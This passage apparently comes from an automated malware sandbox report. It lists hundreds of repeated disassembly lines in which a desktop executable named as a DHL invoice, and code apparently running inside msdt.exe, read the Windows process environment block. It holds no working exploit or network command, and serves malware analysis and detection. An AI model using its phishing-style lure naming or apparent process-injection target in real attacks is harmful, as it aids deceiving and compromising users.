          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01513D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01487D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01518DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01478794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01498E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499C450 mov eax, dword ptr fs:[00000030h]
